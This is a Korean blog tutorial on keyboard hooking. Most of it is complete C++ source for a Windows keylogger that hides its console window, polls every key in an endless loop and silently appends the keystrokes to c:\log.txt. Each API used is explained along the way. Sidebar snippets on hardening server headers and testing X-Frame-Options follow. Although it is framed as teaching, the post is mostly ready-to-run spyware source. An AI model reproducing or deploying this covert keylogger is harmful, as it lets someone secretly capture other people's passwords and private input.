기본 콘텐츠로 건너뛰기

Hooking-1

Hooking - 1

후킹이란 운영 체제나 응용 소프트웨어 등의 각종 컴퓨터 프로그램에서 소프트에어 구성 요소 간에 발생하는 함수 호출, 메시지, 이벤트 등을 중간에서 바꾸거나 가로채는 명령, 방법, 기술이나 행위를 말한다.
출처: 위키피디아

키보드 후킹 소스코드를 살펴보며 후킹에 대해 이해해보자.

void Stealth()
{
    HWND Stealth;
    AllocConsole(); 
    Stealth = FindWindowA("ConsoleWindowClass", NULL);
    ShowWindow(Stealth,0);
}

후킹 소스에서 공통적으로 볼 수 있는 형태의 로직으로 이는 콘솔 프로그램 실행 시 콘솔 창을 드러내지 않고 동작시키는 내용이다. 사용된 함수 하나 씩 살펴보자.

BOOL WINAPI AllocConsole(void): 호출 프로세스에 새로운 콘솔을 할당하는 함수로 실패 시 Zero를 반환한다. MSDN

HWND WINAPI FindWindowA(
In_opt LPCTSTR lpClassName,
In_opt LPCTSTR lpWindowName
);
ClassName과 윈도우 명이 일치하는 경우 윈도우 핸들을 가져온다. 실패 시 NULL을 반환한다. MSDN

BOOL WINAPI ShowWindow(
In HWND hWnd,
In int nCmdShow
);
윈도우 보여주기 상태를 설정한다. SW_HIDE: 0으로 설정 시 창을 숨기고 다른 창을 활성화한다.

이제 이번 예제의 핵심 함수 GetAsyncKeyState()GetKeyState()를 살펴보자.

SHORT WINAPI GetAsyncKeyState(
In int vKey
);
가상 키코드를 인자로 하여 함수가 호출되는 시점에 키를 누르고 있는지 아닌지와 이전에 누른적이 있는 지에 대한 정보를 반환한다. MSDN

반환값 설명
0 (0x0000) 이전에 누른 적이 없고 호출 시점에서 안눌린 상태
0x8000 이전에 누른 적이 없고 호출 시점에서 눌린 상태
0x8001 이전에 누른 적이 있고 호출 시점에서 눌린 상태
1 (0x0001) 이전에 누른 적이 있고 호출 시점에서 안눌린 상태

표 출처: 누구나가 다 이해할 수 있는 프로그래밍 첫걸음

SHORT WINAPI GetKeyState(
In int nVirtKey
);
인자로 전달한 가상 키코드의 상태를 가져온다. GetAsyncKeyState()함수와의 차이점은 GetAsyncKeyState()함수는 메시지 큐와 상관없이 입력하는 순간 즉가적으로 읽어들여 처리하는 반면 GetKeyState()함수는 메시지 큐에 키가 눌러졌다는 메시지가 처리되지 않고 남아 있는 것으로 키가 눌러졌음을 보고 처리한다.

전체 소스코드를 살펴보며 동작을 이해하자.

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>

 int getKeyValue(int scanCode) { // shift, caps lock 키 처리
        if (!(GetKeyState(VK_SHIFT) & 0x1000) && !(GetKeyState(VK_CAPITAL) & 0x0001)) {   
            if(scanCode>=0x41 && scanCode<=0x5A)
            scanCode+= 0x20;
        }
        if (!(!(GetKeyState(VK_SHIFT) & 0x1000) && !(GetKeyState(VK_CAPITAL) & 0x0001))) {   
            if(scanCode == 0x31)
            scanCode-= 0x10;
        }
        return scanCode;
    }


int Save (int key_stroke, char *file)
{
    FILE *OUTPUT_FILE;
    OUTPUT_FILE = fopen("c:\\log.txt", "a+");

    cout << key_stroke << endl;
    key_stroke=getKeyValue(key_stroke);

    if(key_stroke == 8) // 조판 부호 분기문으로 별도 처리하여 기록
    fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
    else if (key_stroke == 13)
    fprintf(OUTPUT_FILE, "\n");
    else if (key_stroke == 32)
    fprintf(OUTPUT_FILE, "%s", " ");
    else if (key_stroke == VK_TAB)
    fprintf(OUTPUT_FILE, "%s", "[TAB]");
    else if (key_stroke == VK_SHIFT)
    fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
    else if (key_stroke == VK_CONTROL)
    fprintf(OUTPUT_FILE, "%s", "[CTRL]");
    else if (key_stroke == VK_ESCAPE)
    fprintf(OUTPUT_FILE, "%s", "[ESC]");
    else if (key_stroke == 0x12)
    fprintf(OUTPUT_FILE, "%s", "[ALT]");
    else if (key_stroke == 0x18)
    fprintf(OUTPUT_FILE, "%s", "[ALT]");
    else if (key_stroke == 0x14)
    fprintf(OUTPUT_FILE, "%s", "[CapsLock]");
    else if (key_stroke == 0x15)
    fprintf(OUTPUT_FILE, "%s", "[Hangle]");
    else if (key_stroke == 0x19)
    fprintf(OUTPUT_FILE, "%s", "[HanJa]");
    else if (key_stroke == VK_END)
    fprintf(OUTPUT_FILE, "%s", "[END]");
    else if (key_stroke == VK_HOME)
    fprintf(OUTPUT_FILE, "%s", "[HOME]");
    else if (key_stroke == VK_LEFT)
    fprintf(OUTPUT_FILE, "%s", "[LEFT]");
    else if (key_stroke == VK_UP)
    fprintf(OUTPUT_FILE, "%s", "[UP]");
    else if (key_stroke == VK_RIGHT)
    fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
    else if (key_stroke == VK_DOWN)
    fprintf(OUTPUT_FILE, "%s", "[DOWN]");
    else if (key_stroke == 190 || key_stroke == 110)
    fprintf(OUTPUT_FILE, "%s", ".");
    else
    fprintf(OUTPUT_FILE, "%s", &key_stroke);

    fclose (OUTPUT_FILE);
    return 0;
}

//-----------------------------------------------------

void Stealth() // 콘솔 창 감추기
{
    HWND Stealth;
    AllocConsole();
    Stealth = FindWindowA("ConsoleWindowClass", NULL); 
    ShowWindow(Stealth,0);
}

//-----------------------------------------------------

//-----------------------------------------------------

int main()
{
  Stealth();


    char i;   
    while (1) // 키로깅 반복
    {
        for(i = 8; i <= 190; i++)
        {
            if (GetAsyncKeyState(i) == HC_ACTION)
            Save (i,"log");
        }
    }
    system ("PAUSE");
    return 0;
}

이 블로그의 인기 게시물

Remove-Server-Header

응답 메시지 내 서버 버전 정보 제거 1. Apache 1) 조치 방법 “/etc/htpd/conf/httpd.conf” 파일 안에서 1. ServerTokens OS → ServerTokens Prod 2. ServerSignature On → ServerSignature Off 로 변경한 후 아파치를 재시작하면 헤더 값의 아파치 버전 정보 및 OS 정보를 제거할 수 있다. 2) 참고 URL http://zetawiki.com/wiki/CentOS_ 아파치_보안권장설정_ServerTokens_Prod,_ServerSignature_Off 2. IIS 1) 조치 방법 IIS 6.0 urlscan_setup 실행. 설치. \windows\system32\inetsrv\urlscan\urlscan.ini 파일을 열어 다음 수정(RemoveServerHeader=0 을 RemoveServerHeader=1 로 변경) 서비스에서 IIS Admin Service 재시작. IIS 7.0 IIS 관리자를 열고 관리하려는 수준으로 이동합니다. 기능 보기에서 HTTP 응답 헤더를 두 번 클릭합니다. HTTP 응답 헤더 페이지에서 제거할 헤더를 선택합니다. 작업 창에서 제거를 클릭하고 예를 클릭합니다. 2) 참고 URL IIS 6.0 : http://gonnie.tistory.com/entry/iis6- 응답헤더-감추기 IIS 7.0 : https://technet.microsoft.com/ko-kr/library/cc733102(v=ws.10).aspx 3. jetty 1) 조치 방법 “jetty.xml” 파일에서 jetty.send.server.version=false 설정 2) 참고 URL http://attenuated-perspicacity.blogspot.kr/2009/09/jetty-61x-hardening.html 4. Nginx

X-Frame-Options-Test

X-Frame-Options 테스트하기 X-Frame-Options 페이지 구성 시 삽입된 프레임의 출처를 검증하여 허용하지 않는 페이지 URL일 경우 해당 프레임을 포함하지 않는 확장 응답 헤더이다. 보안 목적으로 사용되는 확장 헤더로 아직 적용되지 않은 사이트들이 많지만 앞으로 점차 적용될 것으로 보인다. X-Frame OptionsDENY, SAMEORIGIN, ALLOW-FROM 옵션을 이용하여 세부 정책을 설정한다. 옵션 설명 DENY Frame 비허용 SAMEORIGIN 동일한 ORIGIN에 해당하는 Frame만 허용 ALLOW-FROM 지정된 ORIGIN에 해당하는 Frame만 허용 크롬 4.1 , IE 8 , 오페라 10.5 , 사파리 4.0 , 파이어폭스 3.6.9 이상에서는 DENY , SAMEORIGIN 이 적용되며, ALLOW-FROM 은 각 브라우저 마다 지원 현황이 다르다. https://developer.mozilla.org/ko/docs/Web/HTTP/Headers/X-Frame-Options 해당 확장헤더는 브라우저에서 처리하는 응답 헤더이므로 미지원 브라우저 사용 시 설정과 무관하게 페이지 내 포함된 모든 Frame을 출력한다. (검증 테스트: Opera 5.0.0) 테스트 코드 DENY <!DOCTYPE html> < html lang = "en" > < head > < meta http-equiv = "X-Frame-Options" content = "deny" /> < title > Deny option Test </ title > </ head > < bod

데일 카네기 인간관계론 정리